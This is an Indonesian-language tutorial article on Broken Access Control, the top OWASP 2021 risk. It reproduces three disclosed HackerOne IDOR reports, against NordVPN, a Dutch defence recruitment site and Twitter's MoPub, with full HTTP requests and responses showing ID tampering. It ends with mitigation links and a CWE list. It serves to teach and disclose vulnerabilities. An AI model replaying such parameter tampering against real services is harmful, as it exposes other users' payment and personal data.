Pada Artikel kali ini, akan masuk ke seri Owasp Top 10, kali ini saya akan menjelaskan OWASP Top 10 yang berada di urutan pertama yaitu Broken Access Control, sebelum ke topik, apa itu Owasp & apa itu Owasp Top 10?Open Source Foundation for Application Security (OWASP Foundation)PengantarOWASP merupakan singkatan dari Open Web Application Security Project, yang merupakan sebuah project Security Web Application open source yang diperkasai oleh para penggiat teknologi atau pengembang aplikasi, OWASP sering mengadakan seminar, forum diskusi serta pendidikan untuk para Developer.jadi yang dimaksud OWASP TOP 10? owasp top 10 merupakan sebuah cara untuk mengkategorikan resiko kerentanan yang sering terjadi pada sebuah aplikasi berbasis website, dari yang paling atas (resiko tertinggi) hingga yang paling bawah (tingkat resiko rendah), Tujuannya apa ?, tentu saja ini sangat berguna bagi para developer aplikasi supaya mereka jadi lebih aware terhadap kerentanan di aplikasi mereka.di artikel ini kita akan membahas owasp top 10 yang paling teratas untuk tahun 2021 (owasp tiap 4 tahun sekali), ialah Broken Access Control.Broken Access ControlApa itu Broken Access Control ?Broken Access Control adalah sebuah kondisi yang dimana sebuah sistem aplikasi yang tidak punya Authorisasi yang cukup, sehingga sistem tidak cukup baik dalam mengenal identitas user itu sendiri yang mengakibatkan sistem bisa menerima request dari yang seharusnya bukan hak user itu sendiri. (Guest user dapat hak Admin User).Kelemahan sistem diatas bisa menyebabkan resiko yang tinggi bagi Confidentiality, Integrity, dan Availability (CIA TRIAD) sebuah data karena tidak difilter oleh developer yang dapat menyebabkan Data Breach (Pencurian data) oleh orang yang tidak bertanggung jawab. Biasanya sistem mengidentifikasi sebuah user dari beberapa hal, id refference (id user), Cookie (session user), PII (email, nomor HP, username), dll.PraktikalBerikut saya cantumkan beberapa contoh report dari orang lain dengan teknik IDOR :1. #751577 IDOR allow access to payments data of any user (Hackerone)disini attacker melakukan POST ke server (tanpa menggunakan authorisasi)POST /api/v1/orders HTTP/1.1 Host: join.nordvpn.com Accept: application/json Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 179 DNT: 1 Connection: close { "payment": { "provider_method_account": "6xdxdd", "parameters": {} }, "action": "order", "plan_id": 653, "user_id": 20027039, "tax_country_code": "TW", "payment_retry": 0, "is_installment": false } Responnya :{ "id": 42615458, "user_id": 20027039, "confirmation": { "id": 23093398, "created_at": "2019-12-04 17:01:35", "updated_at": "2019-12-04 17:01:35", "type": "redirect_post", "value": "{\"url\":\"https:\\/\\/www.coinpayments.net\\/index.php\",\"parameters\":{\"cmd\":\"_pay\",\"reset\":1,\"email\":\"█████\",\"merchant\":\"e64a9629f9a68cdeab5d0edd21b068d3\",\"currency\":\"USD\",\"amountf\":125.64,\"item_name\":\"VPN order\",\"invoice\":\"49476958\",\"success_url\":\"https:\\/\\/join.nordvpn.com\\/payments\\/callback\\/264cae0b89e44a7bd263431b68d1122d\",\"cancel_url\":\"https:\\/\\/join.nordvpn.com\\/order\\/error\\/?error_alert=payment&eu=1\",\"want_shipping\":0}}" } } dari respon diatas, attaker mengganti user_id miliknya dengan menggunakan user_id korban.{ "id": 42616142, "user_id": 89495247, "confirmation": { "id": 23093800, "created_at": "2019-12-04 17:16:48", "updated_at": "2019-12-04 17:16:48", "type": "redirect_post", "value": "{\"url\":\"https:\\/\\/www.coinpayments.net\\/index.php\",\"parameters\":{\"cmd\":\"_pay\",\"reset\":1, \"email\":\"hackerhacker@test.pl\",\"merchant\":\"e64a9629f9a68cdeab5d0edd21b068d3\",\"currency\":\"USD\",\"amountf\":125.64, \"item_name\":\"VPN order\",\"invoice\":\"49478089\",\"success_url\":\"https:\\/\\/join.nordvpn.com\\/payments\\/callback\\/ 4513bd083a97e1b5c23c69096d89ac80\",\"cancel_url\":\"https:\\/\\/join.nordvpn.com\\/order\\/error\\/?error_alert=payment&eu=0\", \"want_shipping\":0}}" } } kemudian attacker mengganti user_id ke 23093782, output nya seperti ini :{ "id": 42616121, "user_id": 89495166, "confirmation": { "id": 23093782, "created_at": "2019-12-04 17:16:14", "updated_at": "2019-12-04 17:16:14", "type": "redirect", "value": "https://pay.gocardless.com/flow/RE000W16X7XH4JCXJZ623MS6H7W316N3" } } kemudian attacker mengganti user_id ke 89495247 (Victims account), output nya seperti ini :{ "id": 42616142, "user_id": 89495247, "confirmation": { "id": 23093800, "created_at": "2019-12-04 17:16:48", "updated_at": "2019-12-04 17:16:48", "type": "redirect_post", "value": "{\"url\":\"https:\\/\\/www.coinpayments.net\\/index.php\",\"parameters\":{\"cmd\":\"_pay\",\"reset\":1,\"email\":\"hackerhacker@test.pl\",\"merchant\":\"e64a9629f9a68cdeab5d0edd21b068d3\",\"currency\":\"USD\",\"amountf\":125.64,\"item_name\":\"VPN order\",\"invoice\":\"49478089\",\"success_url\":\"https:\\/\\/join.nordvpn.com\\/payments\\/callback\\/4513bd083a97e1b5c23c69096d89ac80\",\"cancel_url\":\"https:\\/\\/join.nordvpn.com\\/order\\/error\\/?error_alert=payment&eu=0\",\"want_shipping\":0}}" } } Impact yang terjadi dikarenakan kerentanan ini :Pencurian sensitive data milik costumer2. #227522 IDOR in editing courses (Hackerone)Lanjut ke contoh kedua, attacker dapat mengedit hasil kursus (course) user lain, yang bisa membuat Integritas sebuah web tercoreng.POST /instellingen/addcursus HTTP/1.1 Host: mijn.werkenbijdefensie.nl User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: */* Accept-Language: nl,en-US;q=0.7,en;q=0.3 Referer: https://mijn.werkenbijdefensie.nl/instellingen/gegevens/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-TOKEN: 34eb64be-ed52-442a-b945-f94b516da205 X-Requested-With: XMLHttpRequest Content-Length: 77 Cookie: [cookiedata] Connection: close id=92973&name=test2&behaald=0&jaar=2022&omschrijving=test2&resultaat=test2%0A dari data diatas kita dapat tarik kesimpulan bahwa id 92973 merupakan sebuah id kursus yang ada di website itu.Attacker dapat menambahkan kursus lain lalu melihat isinya dengan bantuan aplikasi seperti burp suite, OWASP ZAP, Intruder, dsbImpact :extract the ID parameter valuelookup if the user has any course linked to his account with this ID3. #544329 IDOR and statistics leakage in Orders (Hackerone)Aplikasi Twitter punya service yang namanya MoPub yang difiturnya terdapat result dari order endpoint : https://app.mopub.com/web-client/api/orders/stats/query%22buat akun di https://app.mopub.com/ lalu loginpergi ke https://app.mopub.com/orders lalu buat orderintercept lalu post, tapi ganti parameter orderKeysPOST /web-client/api/orders/stats/query HTTP/1.1 Host: app.mopub.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://app.mopub.com/orders Content-Type: application/json x-csrftoken: {TOKEN} Content-Length: 98 Connection: close Cookie: csrftoken={TOKEN}; sessionid={SID}; mp_mixpanel__c=1; {"startTime":"2019-04-07","endTime":"2019-04-20","orderKeys":["43b29d60a9724fa9abbdc800044002d6"]} Impact :Pencurian DataMitigasiInsecure Direct Object Reference (IDOR) Vulnerability — GeeksforGeeksInsecure Direct Object Reference (IDOR) Vulnerabilities in Brief | NetsparkerPrevent Parameter Tampering | Web Application Testing | QualitrixBeberapa kerentanan lain di list CWE:WE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)WE-23 Relative Path TraversalWE-59 Improper Link Resolution Before File Access (‘Link Following’)CWE-200 Exposure of Sensitive Information to an Unauthorized ActorCWE-201 Exposure of Sensitive Information Through Sent DataCWE-219 Storage of File with Sensitive Data Under Web RootCWE-264 Permissions, Privileges, and Access Controls (should no longer be used)CWE-275 Permission IssuesCWE-276 Incorrect Default PermissionsCWE-284 Improper Access ControlCWE-285 Improper AuthorizationCWE-352 Cross-Site Request Forgery (CSRF)CWE-359 Exposure of Private Personal Information to an Unauthorized ActorCWE-377 Insecure Temporary FileCWE-402 Transmission of Private Resources into a New Sphere (‘Resource Leak’)CWE-425 Direct Request (‘Forced Browsing’)CWE-441 Unintended Proxy or Intermediary (‘Confused Deputy’)CWE-497 Exposure of Sensitive System Information to an Unauthorized Control SphereCWE-538 Insertion of Sensitive Information into Externally-Accessible File or DirectoryCWE-540 Inclusion of Sensitive Information in Source CodeCWE-548 Exposure of Information Through Directory ListingCWE-552 Files or Directories Accessible to External PartiesCWE-566 Authorization Bypass Through User-Controlled SQL Primary KeyCWE-601 URL Redirection to Untrusted Site (‘Open Redirect’)CWE-639 Authorization Bypass Through User-Controlled KeyCWE-651 Exposure of WSDL File Containing Sensitive InformationCWE-668 Exposure of Resource to Wrong SphereCWE-706 Use of Incorrectly-Resolved Name or Reference